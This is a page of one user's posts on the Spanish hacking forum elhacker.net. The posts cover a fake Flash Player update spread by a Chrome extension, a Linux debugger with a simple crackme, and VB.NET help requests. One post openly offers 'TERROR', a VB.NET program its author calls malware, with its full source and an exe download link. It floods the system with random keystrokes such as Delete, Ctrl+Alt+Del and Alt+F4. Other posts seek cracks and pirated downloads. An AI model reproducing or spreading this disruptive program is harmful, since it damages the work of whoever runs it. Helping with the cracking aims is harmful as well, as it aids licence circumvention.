elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Seguridad / Falsa actualización de flash player gracias a una extensión de google chrome en: 21 Octubre 2012, 18:36 pm
Hola a todos !

bien, pues con la novedad de que hoy en la mañana al abrir fotos en facebook, me aparecia un mensaje mal presentado de actualizar flash player, y al dar clik me mandaba a una pagina que no era de adobe... (http://get-softwarefree.com/media-flash-player)

Obviamente no caí en la trampa y no sé que tipo de software instala... el detalle es que es molesto ese anuncio y en un principio lo quite con addblok pero luego pensé que podía estar afectando algo más... busque algo de información en internet y sólo hay una poca de info en un foro de google 

La cosa es que ahí mencionan que es una extensión llamada "extensión web store" pero no deja desinstalar desde chrome... así que me di a la tarea de buscarla en app data y está en  "Local\Google\Chrome\User Data\Default\Extensions\nefbimbphlddggoikpapfadmgbjjibpl"

La cosa es que hace mucho que no programo nada, y al intentar interpretar el código me pierdo... quisiera que alguien lo interpretara y me dijera exactamente que hace para saber hasta donde llego el daño...

Para obtener la carpeta con el código manden un MP para mandárselo por correo u otro medio que prefieran pero que sea en privado para evitar que se difunda porque al parecer esto es muy nuevo debido a la escasa información...
2  Sistemas Operativos / Windows / Algo pasó que hizo que se instalara la temible, "kb971033" en: 9 Septiembre 2011, 22:15 pm
Hola!

Se me ocurrió instalar el "windows live esentials", o como se llame. el punto es que quería el messenger, y creo que de paso me activo las actualizaciones automáticas, ademas de no avisarme y se actualizó 2 veces. ¬¬

Lo único que se me ocurrió fue restaurar el sistema. Así lo hice y parece ser que funcionó, pero leyendo por ahí, aplican métodos mucho más complejos, y no se si se valla a tardar algunos días en lanzarme el aviso, o si quedó solucionado el problema, porque si no por qué razon la gente recurriría esos métodos y no simplemente restaurar como yo lo hice y ya ?

Saludos  :D

PD: uso windows 7
3  Foros Generales / Foro Libre / Pase de tener 1 mega de velocidad a 5 megas y no sé que bajar en: 10 Agosto 2011, 00:51 am
Me podrían recomendar programas, o películas (adiós al dvdrip hola al fulldvd) para bajar?

Me refiero a programas pesados y que bale la pena tener, como el rosseta stone (ya lo tengo).

Saludos!
4  Media / Diseño Gráfico / ¿Alguien sabe usar el pothosop así.....? ( Speed painting) en: 21 Enero 2009, 04:06 am
Bueno este estilo en youtube se a puesto como que de moda  :P y me preguntaba si alguien de el foro hace vídeos así  ;D

les dejo un vídeo, creo que el autor es el pionero de ese estilo



saludos
5  Programación / Ingeniería Inversa / olly debugger para linux descarga y ayuda por que no se usarlo xD en: 29 Diciembre 2008, 11:23 am
Hola!

bueno pues me encontré un programa que viene siendo el equivalente al olly debugger para linux...

les dejo el link de la pagina y como en la pagina no hay binarios así que quizá quieran los ya compilados, bueno pues también se los dejo ya compilado por mi (eso si no lo limpie sigue teniendo los archivos de código fuente )

bueno la pagina: http://www.codef00.com/

y la descarga ya compilada esta aquí: http://rapidshare.com/files/177789140/debugger.tar.gz


bueno la cosa es que en windows sabia usar un poco el olly pero ya tiene mucho que no lo uso y aunque este programa se parece no es todo igual y la verdad estoy muy despistado

hice un crackme para probar pero no pude resolverlo les dejo el codigo fuente tambien de el crackme aver si alguien se anima a aprender a usar este desamblador y pone un tuto  ;D
Código
  1. #include <iostream>
  2. using namespace::std;
  3.  
  4. int main(){
  5.  
  6. int clave = 12345;int pass;
  7.  
  8.  
  9.  
  10. for(int i = 0; i < 10; i++){
  11.  
  12. cout << "introduce la clave ";
  13. cin >> pass;
  14. if (pass == clave){
  15. cout << "felicidades as encontrado la clave\nla clave era 12345 y lo has conseguido en el intento" << 9-i << endl;
  16. return 0;
  17.  }
  18. if (pass != clave){
  19. cout << "la clave introducida no es la correcta, vuelve a intentarlo\nintentos restantes: " << 9-i << "\n" << endl;
  20.  }
  21. }
  22.  
  23.  
  24.  }


seguro dirán que para que quiero esto en linux... bueno hay un programa que la medicina no surte efecto con wine como surte en windows.. de alguna manera debe de detectar que no es windows si no linux y utilizara otro método para registrarse o algo

bueno espero me puedan ayudar

saludos
6  Programación / .NET (C#, VB.NET, ASP) / Pequeño code en vb.net (un loco anda suelta jaja) en: 15 Marzo 2008, 23:57 pm
Hola bien pues hice un pequeño code que puede ser dvertido o peligroso si no se le maneja con cuidado al programa lo he llamado TERROR
se que es malware pero no se que tipo alguien save? o sera un nuevo tipo jejejje
si no lo quieren compilar aqui esta la url de descarga http://rapidshare.com/files/99715436/TERROR.exe


Código
  1. Public Class Form1
  2.    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  3.        Dim rnd As New Random
  4.        Dim a As Integer
  5.        For b = 0 To 999999999999999999
  6.            a = rnd.Next(0, 12)
  7.            If a = 0 Then
  8.                adm()
  9.            End If
  10.            If a = 1 Then
  11.                entrar()
  12.            End If
  13.            If a = 2 Then
  14.                suprimir()
  15.            End If
  16.            If a = 3 Then
  17.                tabs()
  18.            End If
  19.            If a = 4 Then
  20.                inicio()
  21.            End If
  22.            If a = 5 Then
  23.                arriva()
  24.            End If
  25.            If a = 6 Then
  26.                avajo()
  27.            End If
  28.            If a = 7 Then
  29.                derecha()
  30.            End If
  31.            If a = 8 Then
  32.                izquierda()
  33.            End If
  34.            If a = 9 Then
  35.                pegar()
  36.            End If
  37.            If a = 10 Then
  38.                copear()
  39.            End If
  40.            If a = 11 Then
  41.                guardar()
  42.            End If
  43.            If a = 12 Then
  44.                cerrar()
  45.            End If
  46.        Next
  47.        Close()
  48.    End Sub
  49.    Private Sub tabs()
  50.        SendKeys.SendWait("{TAB}")
  51.    End Sub
  52.    Private Sub entrar()
  53.        SendKeys.SendWait("{ENTER}")
  54.    End Sub
  55.    Private Sub suprimir()
  56.        SendKeys.SendWait("{DELETE}")
  57.    End Sub
  58.    Private Sub inicio()
  59.        SendKeys.SendWait("{HOME}")
  60.    End Sub
  61.    Private Sub arriva()
  62.        SendKeys.SendWait("{UP}")
  63.    End Sub
  64.    Private Sub avajo()
  65.        SendKeys.SendWait("{DOWN}")
  66.    End Sub
  67.    Private Sub derecha()
  68.        SendKeys.SendWait("{RIGHT}")
  69.    End Sub
  70.    Private Sub izquierda()
  71.        SendKeys.SendWait("{LEFT}")
  72.    End Sub
  73.    Private Sub pegar()
  74.        SendKeys.SendWait("^v")
  75.    End Sub
  76.    Private Sub copear()
  77.        SendKeys.SendWait("^c")
  78.    End Sub
  79.    Private Sub guardar()
  80.        SendKeys.SendWait("^{g}")
  81.    End Sub
  82.    Private Sub cerrar()
  83.        SendKeys.SendWait("%{f4}")
  84.    End Sub
  85.    Private Sub adm()
  86.        SendKeys.SendWait("^%{DEL}")
  87.    End Sub
  88. End Class
7  Programación / .NET (C#, VB.NET, ASP) / Como hacer que se cree un objeto a traves de otro objeto (¿se puede?) en: 14 Marzo 2008, 11:58 am
Hola

Bien tratare de ser claro  :P

Ejemplo: dos botones

Botton1: me da un mensaje
Botton2: me da otros dos Bottones
Botton2.1: me da el mismo mensage que el Botton1
Botton2.2: me da otros dos Bottones

Y asi hasta el infinito y como es hasta el infinito por eso quiero que se creen y no esconderlos y despues mostrarlos que seria lo mas simple

se puede???
8  Foros Generales / Sugerencias y dudas sobre el Foro / . en: 1 Marzo 2008, 20:22 pm
.
9  Programación / .NET (C#, VB.NET, ASP) / problema en vb.net al llamar dll escrita en vc++ en: 26 Febrero 2008, 15:56 pm
Hola  :D
Tal ves mi pregunta tenga una respuesta muy ovia  :-[ pero esque lla vusque en todas partes y no
el problema es este estoy aprendiendo a acer dll's en vc++ y me baje unos tutoriales bueno todos son para el vc++ 6 pero llo tengo el vc++2008
la dll tiene dos funciones simples suma y resta de dos numeros batalle mucho para adaptar los ejemplos de los manuales pero al fin consegui que no me aparecieran errores ni advertencias (borrando aqui cambiando esto moviendo aquello )pero cuando la quiero usar para un pregrama en vb.net me marca un erro dice esctamente "Restricción PInvoke: no se pueden devolver variantes."
no se si el error esta en la dll o en en vb
aclaro que estoy usando el vs pro 2008 y que es una dll de mfc
si alguien sabe porfavor diganme (aunque  sea para el 2005 quiza sea igual)

salu2 :D
10  Programación / .NET (C#, VB.NET, ASP) / Visual Studio 2008 E E en español en: 21 Febrero 2008, 16:17 pm
Ya esta disponible visual studio 2008 E E en español y tambien todos sus componentes (vb, vc#, vc++ y vw) la imagen del studio pesa casi tres gigas pero la descarga tarda unas 10 horas yo  baje todo aqui esta la url http://www.microsoft.com/express/download/
saludos
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines